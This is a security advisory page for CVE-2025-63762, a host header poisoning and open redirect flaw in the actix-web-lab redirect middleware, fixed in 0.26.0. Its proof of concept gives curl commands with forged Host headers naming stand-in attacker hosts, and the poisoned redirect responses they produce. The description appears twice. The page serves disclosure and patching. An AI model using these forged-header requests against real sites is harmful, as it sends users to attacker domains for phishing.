Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
5.4
actix-web-lab can redirect to attacker-specified URLs
GHSA-vhj5-x93p-67jw
Summary
actix-web-lab's redirect middleware can be tricked into sending users to any website. This can be used to phish or scam users. To fix, ensure that your server only allows trusted hosts to access your site.
What to do
- Update actix-web-lab to version 0.26.0.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | actix-web-lab | <= 0.25.0 | 0.26.0 |
Original title
actix-web-lab has host header poisoning in redirect middleware can generate attacker-controlled absolute redirects
Original description
### Summary
`actix-web-lab` redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, `https://{hostname}{path}`). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison the `Location` response header, causing open redirect/phishing behavior.
### CVE
Assigned CVE ID: CVE-2025-63762
### Details
The issue is in redirect middleware paths that construct absolute URLs from `req.connection_info()`:
1. `actix-web-lab/src/redirect_to_https.rs` (around lines 119-132)
- `let host = conn_info.host();`
- `format!("https://{hostname}{path}")`
- `format!("https://{hostname}:{port}{path}")`
2. `actix-web-lab/src/redirect_to_www.rs` (around lines 30-35)
- `format!("{scheme}://www.{host}{path}")`
3. `actix-web-lab/src/redirect_to_non_www.rs` (around lines 30-34)
- `format!("{scheme}://{host_no_www}{path}")`
Because host values come from request connection metadata, untrusted Host input can influence redirect targets when deployment-side host validation is missing.
### PoC
Environment used for validation:
- Local minimal Actix apps using `actix-web-lab` middleware
- RedirectHttps: `http://127.0.0.1:18080`
- redirect_to_www: `http://127.0.0.1:18081`
- redirect_to_non_www: `http://127.0.0.1:18082`
Reproduction (RedirectHttps):
```bash
curl.exe -i -s "http://127.0.0.1:18080/test" -H "Host: attacker.example"
```
Observed response:
```http
HTTP/1.1 307 Temporary Redirect
location: https://attacker.example/test
```
Additional verification:
```bash
curl.exe -i -s "http://127.0.0.1:18080/abc/def" -H "Host: evil.example:9999"
```
Observed response:
```http
HTTP/1.1 307 Temporary Redirect
location: https://evil.example/abc/def
```
Reproduction (redirect_to_www):
```bash
curl.exe -i -s "http://127.0.0.1:18081/hello" -H "Host: attacker.example"
```
Observed response:
```http
HTTP/1.1 307 Temporary Redirect
location: http://www.attacker.example/hello
```
Reproduction (redirect_to_non_www):
```bash
curl.exe -i -s "http://127.0.0.1:18082/path" -H "Host: www.attacker.example"
```
Observed response:
```http
HTTP/1.1 307 Temporary Redirect
location: http://attacker.example/path
```
### Impact
This is a Host header poisoning / open redirect issue. Users can be redirected to attacker-controlled domains, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (proxy/app allowlisting) is impacted.
`actix-web-lab` redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, `https://{hostname}{path}`). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison the `Location` response header, causing open redirect/phishing behavior.
### CVE
Assigned CVE ID: CVE-2025-63762
### Details
The issue is in redirect middleware paths that construct absolute URLs from `req.connection_info()`:
1. `actix-web-lab/src/redirect_to_https.rs` (around lines 119-132)
- `let host = conn_info.host();`
- `format!("https://{hostname}{path}")`
- `format!("https://{hostname}:{port}{path}")`
2. `actix-web-lab/src/redirect_to_www.rs` (around lines 30-35)
- `format!("{scheme}://www.{host}{path}")`
3. `actix-web-lab/src/redirect_to_non_www.rs` (around lines 30-34)
- `format!("{scheme}://{host_no_www}{path}")`
Because host values come from request connection metadata, untrusted Host input can influence redirect targets when deployment-side host validation is missing.
### PoC
Environment used for validation:
- Local minimal Actix apps using `actix-web-lab` middleware
- RedirectHttps: `http://127.0.0.1:18080`
- redirect_to_www: `http://127.0.0.1:18081`
- redirect_to_non_www: `http://127.0.0.1:18082`
Reproduction (RedirectHttps):
```bash
curl.exe -i -s "http://127.0.0.1:18080/test" -H "Host: attacker.example"
```
Observed response:
```http
HTTP/1.1 307 Temporary Redirect
location: https://attacker.example/test
```
Additional verification:
```bash
curl.exe -i -s "http://127.0.0.1:18080/abc/def" -H "Host: evil.example:9999"
```
Observed response:
```http
HTTP/1.1 307 Temporary Redirect
location: https://evil.example/abc/def
```
Reproduction (redirect_to_www):
```bash
curl.exe -i -s "http://127.0.0.1:18081/hello" -H "Host: attacker.example"
```
Observed response:
```http
HTTP/1.1 307 Temporary Redirect
location: http://www.attacker.example/hello
```
Reproduction (redirect_to_non_www):
```bash
curl.exe -i -s "http://127.0.0.1:18082/path" -H "Host: www.attacker.example"
```
Observed response:
```http
HTTP/1.1 307 Temporary Redirect
location: http://attacker.example/path
```
### Impact
This is a Host header poisoning / open redirect issue. Users can be redirected to attacker-controlled domains, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (proxy/app allowlisting) is impacted.
ghsa CVSS3.1
5.4
Vulnerability type
CWE-601
Open Redirect
Published: 11 Mar 2026 · Updated: 13 Mar 2026 · First seen: 11 Mar 2026